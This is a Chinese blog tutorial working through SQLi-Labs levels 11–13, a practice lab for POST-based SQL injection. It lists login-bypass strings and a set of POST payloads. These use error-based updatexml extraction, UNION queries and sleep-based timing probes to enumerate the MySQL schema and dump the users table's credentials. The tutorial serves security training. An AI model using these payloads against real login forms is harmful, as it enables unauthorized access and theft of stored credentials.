SqliLab_Mysql_Injection详解_字符型注入(六)_POST型注入_UNION联合查询/报错注入(11~13)

最新推荐文章于 2024-03-30 14:41:08 发布
最新推荐文章于 2024-03-30 14:41:08 发布
阅读量342 收藏 1
点赞数 1
分类专栏: # MYSQL注入学习 文章标签: POST型注入 报错注入 UNION联合查询
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41260930/article/details/102701360
版权

文章目录

1. SqliLab_Mysql_Injection详解_字符型注入(六)
1.1. SQL注入_POST型注入
1.1.1. 原理
  • 在登录处,用于用户名密码的判断会使用select语句;
    select uname and passwd from table where uname = ’ ’ and passwd = ’ ';
  • 在修改密码时,如果使用到数据库,会用到update语句;
    update table set passwd = ’ ’ where uname = ’ ’ ;
  • 在商城系统中,如订单的添加,删除,可能会使用到insert、delete语句;
    insert into table(uname,passwd) values(’ ‘,’ ’ )
    delete from table where uname = ’ ’
    (在不同的场景下,注入语句切换测试即可)
    POST型盲注通杀payload:uname=admin%df’or()or%200%23&passwd=1&submit=Submit
    常用的username语句
a' or 1=1 #
a ") or 1=1 #
a') or 1=1 #
a" or "1"="1
'or '1'='1
' or (length(database())) = 8 (用于输入’ “都没有错误)
' or (ascii(substr((select database()) ,1,1))) = 115 
// (用于输入’ “都没有错误)
") or ("1")=("1
") or 1=1 or if(1=1, sleep(1), null) #
") or (length(database())) = 8 #
") or (ascii(substr((select database()) ,1,1))) = 115 or
if(1=1, sleep(1), null) #
//个人推荐使用下面的语句
admin'#
admin')#
admin"#
admin")#
admin'or'1'='1#
//等等来构造恒真语句(密码随便输)
2. SqliLab关卡(包含11,12,13)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中)
2.1. SqliLab-11(POST 型注入(单引号闭合)):
2.1.1. 初始界面

在这里插入图片描述

2.1.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
在这里插入图片描述
EG:

uname=a or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用(or 1=2)进行构造;
uname=a' or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数‘uname’存在注入,闭合字符为【'】;

在这里插入图片描述
由此,判断出参数‘uname’存在POST注入(xor一样),闭合字符为【’】万能密码为(admin’#));
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

uname=a'' or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),尝试用(')代替()进行构造;
uname=a'" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误有提示(预期错误有提示),存在SQL语句报错信息提示;

经过尝试,服务器返回页面存在SQL语句报错信息提示(可以尝试使用报错注入);
再次判断是否存在时间注入,通过判断出的闭合字符(’)以及登录成功查看到的一个用户名(Dumb)进行尝试;
EG:

uname=Dumb' and if(1=1,sleep(4),1) %23&passwd=1&submit=Submit
//服务器返回延迟为5秒(1秒查询,4秒休眠),尝试sleep(5);
uname=Dumb' and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回延迟为6秒(1秒查询,5秒休眠),尝试sleep(8);
uname=Dumb' and if(1=1,sleep(8),1) %23&passwd=1&submit=Submit
//服务器返回延迟为9秒(1秒查询,8秒休眠),尝试sleep(9);
uname=Dumb' and if(1=1,sleep(5),1) %23&passwd=1&submit=Submit
//服务器返回延迟为10秒(1秒查询,9秒休眠),基本可以判断参数(uname)存在时间注入;

在这里插入图片描述
经过测试,参数(uname)存在时间注入(布尔盲注同理);
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在回显和报错提示的情况,这时候就可以考虑利用UNION联合查询法查看显位以及报错注入和盲注的方式来获取想要获得信息;

2.1.3. 收集数据库信息

由于此次在判断注入点判断过程中,发现可以采取多种方式获取想要的信息,这里采用报错注入的方式(复习一下之前的知识);
EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数,version()函数,database()函数等构造payload;

uname=Dumb' and updatexml(1,concat(0x7c,version(),0x7c,database(),0x7c, user(),0x7c),1) %23&passwd=1&submit=Submit
//返回数据库的版本信息,当前使用数据库的名字,数据库用户;
...

已查询到数据库的版本信息,当前使用数据库的名字,数据库用户等;
在这里插入图片描述
查询到一些数据库信息如,数据库版本,数据库名等;

2.1.4. 查询Mysql中存在的其他数据库

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=Dumb' and updatexml(1,mid(concat(0x7c,(select group_concat(schema_name) from information_schema.schemata),0x7c),1,32),1) %23&passwd=1&submit=Submit
//服务器返回页面错误,但查看到报错信息显示了当前使用mysql中使用的数据库有哪些数据库,mid()函数来截取返回的较长字符串;
...
uname=Dumb' and updatexml(1,mid(concat(0x7c,(select group_concat(schema_name) from information_schema.schemata),0x7c),39,32),1) %23&passwd=1&submit=Submit
//从页面返回信息中成功看到最后的标识符(|),则说明查询信息完毕;

在这里插入图片描述

2.1.5. 查询当前数据库‘security’存在的表

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=Dumb' and updatexml(1,concat(0x7c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7c),1) %23&passwd=1&submit=Submit
//服务器返回页面错误,但查看到报错信息显示了当前使用数据库中存在的表有(emails,referers,uagents,users);

在这里插入图片描述
当前使用数据库中存在的表有(emails,referers,uagents,users)

2.1.6. 查询‘users’表的字段

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=Dumb' and updatexml(1,concat(0x7c,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7c),1) %23&passwd=1&submit=Submit
//服务器返回页面错误,但查看到报错信息显示了‘users’表的字段为(id,username,password)

在这里插入图片描述
‘users’表的字段为(id,username,password);

2.1.7. 查询‘users’表的字段值信息

EG:
使用updatexml()函数/extractvalue()函数/使用floor()函数,group_concat()函数/concat()函数和mid()函数/limit限制构造payload;

uname=Dumb' and updatexml(1,mid(concat(0x7c,(select group_concat(id,0x7c,username,0x7c,password,0x7c) from users),0x7e),1,32),1) %23&passwd=1&submit=Submit
//服务器返回页面错误,但查看到报错信息显示了‘users’表的字段值信息为(1,Dumb,Dumb|2,Angelina,I-kill|。。。。。。);
...
uname=Dumb' and updatexml(1,mid(concat(0x7c,(select group_concat(id,0x7c,username,0x7c,password,0x7c) from users),0x7e),202,32),1) %23&passwd=1&submit=Submit
//从页面返回信息中成功看到最后的标识符(~),则说明查询信息完毕;

在这里插入图片描述
在这里插入图片描述
查询其他的值也是同上面的方法一致;到此,POST型注入(报错注入)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-11结束。

2.2. SqliLab-12(POST型注入(")闭合)):
2.2.1. 初始界面

在这里插入图片描述

2.2.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
在这里插入图片描述
EG:

uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=a" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=a) or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(])代替())进行构造;
uname=a] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(})代替(])进行构造;
uname=a} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替(})进行构造;
uname=a') or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用("))代替('))进行构造;
uname=a") or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用(or 1=2)进行构造;
uname=a") or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数‘uname’存在注入,闭合字符为【")】;

在这里插入图片描述
由此,判断出参数‘uname’存在POST注入(xor一样),闭合字符为【")】万能密码为(admin")#));
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

uname=a")' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误有提示(预期错误有提示),存在SQL语句报错信息提示;

在这里插入图片描述
经过尝试,服务器返回页面存在SQL语句报错信息提示(可以尝试使用报错注入);
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在回显和报错提示的情况,这时候就可以考虑利用UNION联合查询法查看显位以及报错注入来获取想要获得信息;

2.2.3. 收集数据库信息

由于此次在判断注入点判断过程中,发现可以采取多种方式获取想要的信息,这里采用UNION联合查询法查看显位的方式(相对比较快);
EG:
使用order by 猜解字段;

uname=a") order by 1 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),再尝试下面链接;
uname=a") order by 3 %23&passwd=1&submit=Submit
//服务器返回页面错误无提示(预期错误有提示),再尝试下面链接;
uname=a") order by 3 %23&passwd=1&submit=Submit
//服务器返回页面错误有提示(预期错误有提示),查询到字段为(2);

在这里插入图片描述
获取到字段数为(2);
EG:
使用union select ,version(),database()等函数获取数据库信息;

uname=a") union select version(),database() %23&passwd=1&submit=Submit
//服务器返回页面正确,查看到信息显示了当前使用数据库的版本为(MySQL5.5.53),当前使用数据库为(security);
...

在这里插入图片描述
查询到一些数据库信息如,数据库版本,数据库名等;

2.2.4. 查询Mysql中存在的其他数据库

EG:
使用union select ,group_concat()等函数获取Mysql中存在的其他数据库信息;

uname=a") union select 1,group_concat(schema_name) from information_schema.schemata %23&passwd=1&submit=Submit
//服务器返回页面正确,查看到信息显示了当前使用mysql中存在的数据库有
//(information_schema,challenges,mysql,performance_schema,security,test);

在这里插入图片描述
查询Mysql中存在的其他数据库有(information_schema,challenges,mysql,performance_schema,security,test);

2.2.5. 查询当前数据库‘security’存在的表

EG:
使用union select ,group_concat()等函数获取当前数据库‘security’存在的表信息;

uname=a") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&passwd=1&submit=Submit
//服务器返回页面正确,查看到信息显示了当前使用数据库中存在的表有(emails,referers,uagents,users);

在这里插入图片描述
当前使用数据库中存在的表有(emails,referers,uagents,users)

2.2.6. 查询‘users’表的字段

EG:
使用union select ,group_concat()等函数获取 查询‘users’表的字段;

uname=a") union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&passwd=1&submit=Submit
//服务器返回页面正确,查看到信息显示了‘users’表的字段为(id,username,password);

在这里插入图片描述
查询‘users’表的字段为(id,username,password);

2.2.7. 查询‘users’表的字段值信息

EG:
使用union select ,group_concat()等函数获取想要的字段值信息;

uname=a") union select 1,group_concat(username,password) from users %23&passwd=1&submit=Submit
//服务器返回页面正确,查看到信息显示了‘users’表的字段值信息为(DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4);

在这里插入图片描述
查询其他的值也是同上面的方法一致;到此,POST型注入(报错注入)基础流程差不多就结束了,所需要的信息(数据库信息,表字段值等)差不多都已经搜集到了,SqliLab-12结束。

2.3. SqliLab-13(POST 型注入(’)闭合)):
2.3.1. 初始界面

在这里插入图片描述

2.3.2. 判断注入点(关键步骤)

由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的一般结构,所以对username输入处构造判断注入点链接(截断后面语句方式);
尝试使用一般的单引号(’)闭合参数,由于之前遇到过没有使用闭合字符的例子,所以一开始先不使用闭合字符进行判断(通过浏览器的开发者调试查看页面标签元素,发现POST传送参数为uname和passwd);
EG:

uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(')代替()进行构造;
uname=a' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(")代替(')进行构造;
uname=a" or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用())代替(")进行构造;
uname=a) or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(])代替())进行构造;
uname=a] or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用(})代替(])进行构造;
uname=a} or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期正确),尝试用('))代替(})进行构造;
uname=a') or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面正确(预期正确),尝试用(or 1=2)进行构造;
uname=a') or 1=2 %23&passwd=1&submit=Submit
//服务器返回页面错误(预期错误),判断出参数‘uname’存在注入,闭合字符为【')】;

在这里插入图片描述
在这里插入图片描述
经过测试,参数‘uname’存在POST注入(xor一样),闭合字符为【’)】(万能密码为(admin’)#));
EG:
判断服务器返回页面是否存在SQL语句报错信息提示;

uname=a')' or 1=1 %23&passwd=1&submit=Submit
//服务器返回页面错误有提示(预期错误有提示),存在SQL语句报错信息提示;

在这里插入图片描述
在注入点判断过程中,可以发现,服务器在接受请求后,返回的页面存在无回显和有报错提示的情况,这时候如果再利用UNION联合查询法查看显位的方式就失效了,可以采用报错注入的方式来获取想要的信息,具体流程和SqliLab-11的一模一样(只是payload的URL链接(11转变为13)和参数的字符闭合方式发生变化(‘转变为’)),SqliLab-13结束;

3. 总结

POST型注入原理和GET型注入的差不多,变化的是参数的传递方式,根据构造的payload和服务器页面返回结果,采用适合的注入方式获取数据库信息,如返回页面有回显,考虑UNION联合查询,有报错提示,考虑报错注入,只有页面的正确与错误的变化,则是盲注,要是页面始终不变,可以考虑时间盲注等,最后,通过大量的练习,发现,最重要的注入步骤还是在注入点的判断,注入点的成功判断,才能为后面的payload构造做基础。

[如有错误,请指出,拜托了<( _ _ )> !!!]

Tes789123456
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——17、SSI漏洞介绍于挖掘(上)
Fly_鹏程万里
03-01 1096
(1)找注入点http://xx.xx.xx.xx:xxxx/?id=1 #显示内容 http://xx.xx.xx.xx:xxxx/?id=1 ' #无任何显示 (2)字段个数为3:http://xx.xx.xx.xx:xxxx/?id=1 ' order by 3 -- xx #显示正常 http://xx.xx.xx.xx:xxxx/?id=1 ' order by ...
③基于字符SQL注入
熊俊坤的博客
10-24 9911
基于字符SQL注入
mysql字符注入
fdhdgsdfdsa的博客
03-09 370
字符会把1等等数字当成字符,此时数字注入会不起作用,之后需要使用英文状态下单引号闭合前面字符,后面需要注释避免报错 判断是否存在漏洞 当输入1’时报错,当输入1"时正常显示 ,可以判断问题参数为id,漏洞类字符 验证判断 先用单引号闭合,语法后方在注释避免报错,之后用and 1=1和and 1=2来验证判断,如: http://www.xxx.com/sqli/01.php?id=1' and 1=1 -- a 命令中a可随意填写,只是注释需要空格,防止浏览器过滤 返回数据,说明执行
MySQL联合注入字符注入
m0_50211409的博客
03-27 1731
关于字符注入 首先我们都知道,在数据库中字符串都是被单引号与双引号包裹起来的。 我们分析一下字符注入SQL语句 select*from admin where id='1' 这是字符注入后的语句 我们在传参的时候 ...
sql注入字符注入
最新发布
2401_82760239的博客
03-30 1103
接下来查看flag表名下的字段名,用-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'#首先用-1' union select 1,group_concat(schema_name) from information_schema.schemata #,列出所有的数据库。(或称为系统架构)是非常重要的。
xxx.rar_injection xxx_injectionxxx_injection视频xxx_sql_sql注入文档
09-20
联合查询注入则利用了MySQL等数据库支持的UNION操作,将恶意查询与正常查询合并,以达到显示数据库中其他表或列的目的。 防御SQL注入的策略通常包括以下几个方面: 1. **参数化查询**:也称为预编译语句,可以确保...
php中$_GET与$_POST过滤sql注入的方法
10-25
例如,在SQL语句中单引号(')用于定义字符串的开始和结束,因此通过addslashes转义后的字符串就可以避免由于单引号引起的SQL注入问题。然而,addslashes()并不是一种完美的过滤方法,因为它不能防御所有类SQL注入...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
例如,如果输入的name值为name=41%bf%27%20or%20sleep%2810.10%29%3d0%20limit%201%23,那么如果不指定字符编码,就可能会绕过mysql_real_escape_string函数的限制。因此,通常需要与mysql_set_charset函数一起使用...
Mysql-blind-inject.zip_Blind sql injection_SQL inject_blind_blin
09-24
MySQL盲注(Blind SQL Injection)是一种特殊类SQL注入攻击,攻击者无法直接看到数据库的响应,而是通过观察应用程序的间接行为来判断是否存在漏洞或获取数据。这种攻击方式通常发生在目标系统对错误信息进行了...
Mysql注入中的outfile、dumpfile、load_file函数详解
09-09
MySQL注入是一种常见的安全漏洞,允许攻击者通过构造恶意SQL语句来操纵数据库。在这个话题中,我们将深入探讨三个与文件操作相关的MySQL函数:`INTO OUTFILE`、`INTO DUMPFILE`和`LOAD_FILE()`,它们在SQL注入攻击中...
php mysql 字符串_SQL注入之PHP-MySQL实现手工注入-字符
weixin_42205405的博客
01-18 388
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递...
SQL注入——字符注入和无列名注入实例(超详细,小白也能学得会)
m0_69151365的博客
01-28 1473
在这一关中,我们首先判断了sql注入,发现是字符注入,我们先是利用order by 来确定该表中的列数,有了列数我们就可以通过database()函数获取到该网站所在的库,我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables表中查询到了该库中的所有表,又在columns表通过过滤table_name和table_schema两个字段查找出users表中的列(字段)信息,到这一步之后我们就直接在users表中查找用户和密码,此时注入完成。
postgresql字符串切割并转换成in的参数
qq_37891961的博客
08-15 1557
SELECT unnest(string_to_array('56,57,72,73,74,75,76,252,250,58,59,60,77,78,79,61',','))
PostgreSQL数据库的注入
谢公子的博客
03-04 8475
1
PostgreSQL手工注入实战-mozhe
m0_63917373的博客
10-02 406
墨者 PostgreSQL手工注入实战
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 9166
SQL注入原理-字符注入
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1680
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
SQL注入sqli-labs 7 文件上传漏洞
Zeker62的博客
08-12 655
经过不断的测试,知道:sql 语句是:SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1(或者你直接代码审计(看答案)) 项目提示;You are in… Use outfile…,提示我们使用外部文件,所以这十有八九是一个文件上传漏洞,那如何上传?上传什么文件比较好? 通过代码审计我们知道,这玩意永远都不会报错,因为被注释了: $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; $result=.
mysql中插入 字符串数据时 包含一些特殊字符时的处理,防止sql注入
热门推荐
大家好,我姓郑,就是那个被鲁智深三拳打死的那个屠夫的郑~_~~_~
09-06 2万+
比如:address字符串中 包含 \ ' " 时候 在拼接sql语句时,必须在这些字符前加上转义字符 \ 才可以不影响sql语句,可以用字符串处理函数将对应的字符替换成带有转义的字符即可 address = address.replace("\\","\\\\") address = address.replace("'","\\'") address = address.replace('...
"实战应用:传智播客MySQL_C_API编程实践
MySQL_C_API 是一种用于连接到数据库和执行数据库查询的库文件,包含在 mysqlclient 库文件中,并与 MySQL 的源代码一起发行。在这份文档中,我们将使用 MySQL_C_API 来编写一个简单的 helloWorld 应用程序,以轻松...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值